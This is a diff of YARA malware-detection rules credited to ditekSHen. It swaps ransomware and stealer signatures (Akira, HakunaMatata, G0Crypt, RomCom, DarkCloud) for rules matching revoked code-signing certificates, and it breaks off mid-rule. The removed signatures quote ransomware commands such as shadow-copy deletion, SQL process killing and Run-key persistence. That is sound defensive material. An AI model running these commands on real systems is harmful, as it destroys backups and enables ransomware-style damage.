-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10044-L10062"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4257-L4268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71"
+		logic_hash = "34edd92640d8059f074513b526c7a2bf0d9265af9466a2ae66b93255044744c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "BotList" ascii
-		$x2 = "BotCount" ascii
-		$x3 = "/etc/services/zone/bot.log" ascii
-		$x4 = "aaa.com/bbb/me" ascii
-		$s1 = "encoding/gob." ascii
-		$s2 = ".GetMacAddress" ascii
-		$s3 = ".IpString2Uint32" ascii
-		$s4 = ".RegisterLogFile" ascii
-		$s5 = ".UniqueAppendString" ascii
-		$s6 = ".NewDaemon" ascii
-		$s7 = ".SimpleCommand" ascii
+		thumbprint = "1383c4aa2900882f9892696c537e83f1fb20a43f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROKON, OOO" and pe.signatures [ i ] . serial == "00:aa:12:c9:5d:2b:cd:e0:ce:14:1c:6f:11:45:b0:d7:ef" )
 }
-rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03E9Eb4Dff67D4F9A554A422D5Ed86F3 : FILE
 {
 	meta:
-		description = "Detects HakunaMatata ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "43ca40bb-9eb6-558e-977d-f1fff5659565"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b76ab1af-01f9-5d03-8d5e-7314a7a2de43"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10064-L10084"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4270-L4281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c"
+		logic_hash = "a56f53cb94f78496b4935fc2a613d030bd550b749427501dd9dda18cb9e05ab3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
-		$s3 = "<RSAKeyValue><Modulus>" wide
-		$s4 = "HAKUNA MATATA" ascii wide
-		$s5 = "EXCEPTIONAL_FILE" ascii
-		$s6 = "TRIPLE_ENCRYPT" ascii
-		$s7 = "FULL_ENCRYPT" ascii
-		$s8 = "TARGETED_EXTENSIONS" ascii
-		$s9 = "CHANGE_PROCESS_NAME" ascii
-		$s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii
-		$s11 = "<ALL_DRIVES>b__" ascii
-		$s12 = "dataToEncrypt" ascii
-		$s13 = "<RECURSIVE_DIRECTORY_LOOK>" ascii
+		thumbprint = "8f2de7e770a8b1e412c2de131064d7a52da62287"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "philandro Software GmbH" and pe.signatures [ i ] . serial == "03:e9:eb:4d:ff:67:d4:f9:a5:54:a4:22:d5:ed:86:f3" )
 }
-rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : FILE
 {
 	meta:
-		description = "Detects HakunaMatata ransomware builder"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4e39ae25-c62c-5018-9780-d1549b10942f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10086-L10104"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4283-L4294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4"
+		logic_hash = "2493dfe7e5a993a573c7b3c2f2642a8834feb525b3fc8402315a63ac09b9fccd"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ENCRYPT FILES IN PROCESS" wide
-		$s2 = "#TARGET_FILES" ascii wide
-		$s3 = "HAKUNA MATATA" ascii wide nocase
-		$s4 = "#PRIVATE_KEY" ascii wide
-		$s5 = "/target:winexe /platform:anycpu /optimize+" wide
-		$s6 = "/win32icon:" fullword wide
-		$s7 = "SkippedFolders" ascii
-		$s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii
-		$s9 = "DRAW_WALLPAPER(" ascii
-		$s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii
-		$s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii
+		thumbprint = "b37e7f9040c4adc6d29da6829c7a35a2f6a56fdb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" )
 }
-rule DITEKSHEN_MALWARE_Win_Twarbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C6D7Ad852Af211Bf48F19Cc0242Dcd72 : FILE
 {
 	meta:
-		description = "Detect TWarBot IRC Bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3acae103-c8d8-5959-83fd-f47d33da350b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1aca90d4-6cb6-5bcd-a4c9-e8f8cddc0d04"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10106-L10121"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4296-L4307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b1b0b92d2ea7adec58a4b0ac712384542d96dc8707b6f1f13df2d8150a03a7a"
+		logic_hash = "e10de48bfa1edec81157eb95ef3478346c22dd6f7ef163e30887d3c7bb580c5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "TWarBot" fullword ascii
-		$s1 = "PRIVMSG #" ascii
-		$s2 = "C:\\marijuana.txt" fullword ascii
-		$s3 = "C:\\rar.bat" fullword ascii
-		$s4 = "C:\\zip.bat" fullword ascii
-		$s5 = "software\\microsoft\\windows\\currentversion\\app paths\\winzip32.exe" ascii
-		$s6 = "software\\microsoft\\windows\\currentversion\\app paths\\WinRAR.exe" ascii
-		$s7 = "a -idp -inul -c- -m5" ascii
+		thumbprint = "bddcef09f222ea4270d4a1811c10f4fcf98e4125"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APDZQKILIIQVIJSCTY" and pe.signatures [ i ] . serial == "c6:d7:ad:85:2a:f2:11:bf:48:f1:9c:c0:24:2d:cd:72" )
 }
-rule DITEKSHEN_MALWARE_Win_G0Crypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0084888D5A12228E8950683Ecdab62Fe7A : FILE
 {
 	meta:
-		description = "Detects G0Crypt / BRG0SNet / NovaGP ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c0dd8a1b-1aa6-50be-92c4-125eabaf3f9f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5036d604-55df-565a-b6db-c788da007ea8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10123-L10156"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4309-L4320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a678bbb02b82c34fb5e7bdce2e60b0da88f12b094e7ca3b74345814d0da5ce42"
+		logic_hash = "4deda791923cdacccf57d54651ca44bd8c04d053a11ccf5700354f9f37be17de"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "G0Crypt/go/" ascii
-		$x2 = "BRG0SNet" ascii
-		$x3 = "/NovaGroup" ascii
-		$x4 = "novagroup@onionmail.org" ascii nocase
-		$x5 = "# Nova Group" ascii
-		$f1 = "main.HaveRun" ascii
-		$f2 = "main.FindFile" ascii
-		$f3 = "main.deriveKey" ascii
-		$f4 = "main.Pwd" fullword ascii
-		$f5 = "/ClearBashFile" ascii
-		$f6 = "/ClearUserTempFiles" ascii
-		$f7 = "/KillProccess" ascii
-		$f8 = "/Encryptor" ascii
-		$f9 = "/NoDirEncrypt" ascii
-		$f10 = "/RunCmdEexecutable" ascii
-		$f11 = "/StopImportantServices" ascii
-		$f12 = "/GetPwd" ascii
-		$s1 = "\\$Recycle.Bin"
-		$s2 = ".README.txt"
-		$s3 = "\\BRSPATH.exe"
-		$s4 = "taskkill /F /IM sql*"
-		$s5 = "C:\\inetpub\\logs\\"
-		$s6 = "shutdown /r"
-		$s7 = ":\\Program Files\\VMware\\"
-		$s8 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Message /t REG_SZ /d"
-		$s9 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v DelLogSoft /t REG_SZ /d"
+		thumbprint = "390b23ed9750745e8441e35366b294a2a5c66fcd"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $f* ) or ( 1 of ( $x* ) and ( 5 of ( $f* ) or 5 of ( $s* ) ) ) or ( 6 of ( $f* ) and 4 of ( $s* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ub30 Limited" and pe.signatures [ i ] . serial == "00:84:88:8d:5a:12:22:8e:89:50:68:3e:cd:ab:62:fe:7a" )
 }
-rule DITEKSHEN_MALWARE_Win_Akira : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_709D547A2F09D39C4C2334983F2Cbf50 : FILE
 {
 	meta:
-		description = "Detects Akira Ransomware Windows"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "350ecf81-7926-5cd2-b0c8-2dd748775e74"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e3b2ab8b-be90-5593-843f-59f2d626e604"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10220-L10243"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4322-L4333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "73dd0a1b21be8ff7362536f6b6255cd19510632782effd67a56d7656bebf04ff"
+		logic_hash = "f45a2047181f3f07a8fb9cc00aafc31ba7aa369fc5c0165557757306a0de0d44"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "https://akira" ascii
-		$x2 = ":\\akira\\" ascii
-		$x3 = ".akira" ascii
-		$x4 = "akira_readme.txt" ascii
-		$x5 = "\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp" ascii
-		$s1 = "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" ascii
-		$s2 = "Win32_ProcessStartup" fullword wide
-		$s3 = /Failed\sto\smake\s(part|full|spot)\sencrypt/ ascii wide
-		$s4 = "--encryption_" ascii
-		$s5 = "--share_file" ascii
-		$s6 = { 24 00 52 00 45 00 43 00 59 00 43 00 4C 00 45 00 2E 00 42 00 49 00 4E 00 00 00 00 00 6? 6? 6? 00 (24|57) 00 (52|69) 00 }
-		$s7 = " PUBLIC KEY-----" ascii
-		$s8 = ".onion" ascii
-		$s9 = "/Esxi_Build_Esxi6/./" ascii nocase
-		$s10 = "No path to encrypt" ascii
-		$s11 = "-fork" fullword ascii
+		thumbprint = "f10095c5e36e6bce0759f52dd11137756adc3b53"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BMUZVYUGWSQWLAIISX" and pe.signatures [ i ] . serial == "70:9d:54:7a:2f:09:d3:9c:4c:23:34:98:3f:2c:bf:50" )
 }
-rule DITEKSHEN_MALWARE_Linux_Akira : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_98A04Ea05E8A949A4D880D0136794Df3 : FILE
 {
 	meta:
-		description = "Detects Akira Ransomware Linux"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3ac144b3-c747-58e5-bc75-b3f90786f404"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cda10dcf-bc46-56d9-a4b5-60a76249334c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10245-L10264"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4335-L4346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a00154e1cfc442718e753641d3706ffd4dd8465525d0bb2854f74dfb1cf5dd0"
+		logic_hash = "05c63386558b954da3cfec1fd514a7a567189d9ac33d818cbbabf3eaf72ed130"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "https://akira" ascii
-		$x2 = ":\\akira\\" ascii
-		$x3 = ".akira" ascii
-		$x4 = "akira_readme.txt" ascii
-		$s1 = "--encryption_" ascii
-		$s2 = "--share_file" ascii
-		$s3 = { 00 24 52 65 63 79 63 6c 65 2e 42 69 6e 00 24 52 45 43 59 43 4c 45 2e 42 49 4e 00 }
-		$s4 = " PUBLIC KEY-----" ascii
-		$s5 = ".onion" ascii
-		$s6 = "/Esxi_Build_Esxi6/./" ascii nocase
-		$s7 = "No path to encrypt" ascii
-		$s8 = "-fork" fullword ascii
+		thumbprint = "0387ce856978cfa3e161fc03751820f003b478f3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRVFMPRLNIMAMSUIMT" and pe.signatures [ i ] . serial == "98:a0:4e:a0:5e:8a:94:9a:4d:88:0d:01:36:79:4d:f3" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Romcom_Loader : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2355895F1759E9E3648026F4 : FILE
 {
 	meta:
-		description = "Hunt for RomCom loader"
-		author = "ditekShen"
-		id = "49a5398a-e28d-51e2-90d5-479d815f9967"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "d716ed7f-8886-587d-a868-805da13bb925"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10291-L10307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4348-L4360"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aef88aa9f201c3a1852d63b17c14e44c7c2a7dfe94a9bc77897a4aa0eb97486"
+		logic_hash = "429375af70872755ab2d517b125042795c9a20238405a4af5b0caecc46a3f563"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "f46d457898d436769f0c70127044e2019583ee16"
+		hash1 = "f4f4a5953d0c87db611fa05bb51672591295049978a0e9e14eca8224254ecd7a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "DllCanUnloadNow" ) and pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "GetProxyDllInfo" ) ) and for any fn in pe.export_details : ( fn.forward_name contains "Dll" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "23:55:89:5f:17:59:e9:e3:64:80:26:f4" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Romcom_Worker : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00818631110B5D14331Dac7E6Ad998B902 : FILE
 {
 	meta:
-		description = "Hunt for RomCom worker"
-		author = "ditekShen"
-		id = "ce545a33-731c-5ecd-b02e-cedf24f75cc7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "15efa9cf-5457-5b04-abee-8f86721c5d56"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10309-L10322"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4376-L4390"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "488db046458585882a4709438042b57e02d7dbc06483fdfdfc463a64ee8db203"
+		logic_hash = "ee82090ceb1378b44c283586d0f0b6ec0d9779fab2497b0168acec8e5546a4a8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UpdateProcThreadAttribute" fullword ascii
-		$s2 = "WriteFile" fullword ascii
-		$s3 = "GetAdaptersAddresses" fullword ascii nocase
-		$s4 = /inflate\s\d+\.\d+\.\d+\sCopyright/ ascii
-		$s5 = "SetHandleInformation" fullword ascii
-		$s6 = "PeekNamedPipe" fullword ascii
+		thumbprint = "c93082334ef8c2d6a0a1823cdf632c0d75d56377"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) )
 }
 
-rule DITEKSHEN_MALWARE_Win_Romcom_Dropper : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ab21306B11Ff280A93Fc445876988Ab : FILE
 {
 	meta:
-		description = "Hunt for RomCom worker"
-		author = "ditekShen"
-		id = "1b77122d-95d7-535d-897e-b542da17f499"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "583fccef-3ad5-5f9a-a030-d6bf9ebed00f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10324-L10335"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4392-L4403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "89f62f71e5870c1e5d14bc32dd3508da620f5fa85494251c69682eb09d630029"
+		logic_hash = "aa93d36d472d24cdd937c323ffa048fc71984fcf8a13400618ec8a0f2c172fc0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes" wide nocase
-		$s2 = "\\REGISTRY\\USER" wide nocase
-		$s3 = "BINARY" fullword wide
-		$s4 = "POST" fullword wide
+		thumbprint = "6d0d10933b355ee2d8701510f22aff4a06adbe5b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" )
 }
 
-rule DITEKSHEN_MALWARE_Win_STEALDEAL : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0086909B91F07F9316984D888D1E28Ab76 : FILE
 {
 	meta:
-		description = "Hunt for STEALDEAL stealer"
-		author = "ditekShen"
-		id = "4685fea3-4050-5395-af2b-cb0ba4104b47"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "58b191cc-82f2-5ad3-8d1e-91c7528880c6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10337-L10348"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4405-L4416"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "366c33b06ed9403b2b840d98e25287333eb52f2588f747981b3c0c3baf4fd27a"
+		logic_hash = "eb8807437edbbba52a928de4ebf0a25513127bd9800088e0d85e41c8375a05b1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "stealDll.dll" fullword ascii
-		$s1 = "SqlExec" fullword ascii
-		$s2 = "etilqs_" fullword ascii
-		$s3 = "SUBQUERY %u" fullword ascii
+		thumbprint = "5eba3c38e989c7d16c987e2989688d3bd24032bc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "stub" ) and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" )
 }
-rule DITEKSHEN_MALWARE_Win_Darkcloud : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : FILE
 {
 	meta:
-		description = "Detects DarkCloud infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e29e1dc7-87b8-5d6b-b73b-460dc2530875"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d96df78b-3824-5f94-8a32-87dfd9cd585f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10350-L10371"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4418-L4429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7826cc4185d6edb760d062019e0fa30f800c34e5fb4b0eedcfb17081e6c7643d"
+		logic_hash = "845abc1f08a4d56b32477fbe8855f45633833c68f4255d0690f10cc23c167e84"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "=DARKCLOUD=" wide
-		$x2 = "#DARKCLOUD#" wide
-		$x3 = "DARKCLOUD" wide
-		$s1 = "DC-Creds" fullword wide
-		$s2 = "shell.application" fullword wide
-		$s3 = "VBSQLite3.dll" ascii wide nocase
-		$s4 = "getbinaryvalue" fullword wide
-		$s5 = "sqlite_exec" fullword ascii
-		$i1 = "RegWrite" fullword wide
-		$i2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$i3 = "\\Templates\\Stub\\Project" wide
-		$i4 = "\\Credentials" wide
-		$i5 = "SELECT " wide
-		$i6 = "\\163MailContacts.txt" fullword wide
+		thumbprint = "10d82c75a1846ebfb2a0d1abe9c01622bdfabf0a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $i* ) ) ) or ( all of ( $s* ) and 1 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" )
 }
-rule DITEKSHEN_MALWARE_Win_Arcrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_13039Da3B2924B7A8B0A2Ac4637C2Efa : FILE
 {
 	meta:
-		description = "Detects ARCrypt / ChileLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a53bbae6-a321-549d-9d45-e1a408d08740"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9621584b-a115-5b96-8de5-15776232cdb2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10373-L10399"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4431-L4442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc9fa68d093fdf9745a06beb28e29108cb2ba846122ce097ad892213b1edba25"
+		logic_hash = "7492f2a50effae809b512ce7a2a769f3db62ab3573974206b729417cc629ca83"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$c1 = "readme_for_unlock.txt" wide
-		$c2 = "vssadmin.exe delete shadows /all /quiet" wide
-		$c3 = "START /b \"\" cmd /c wmic /node:" wide
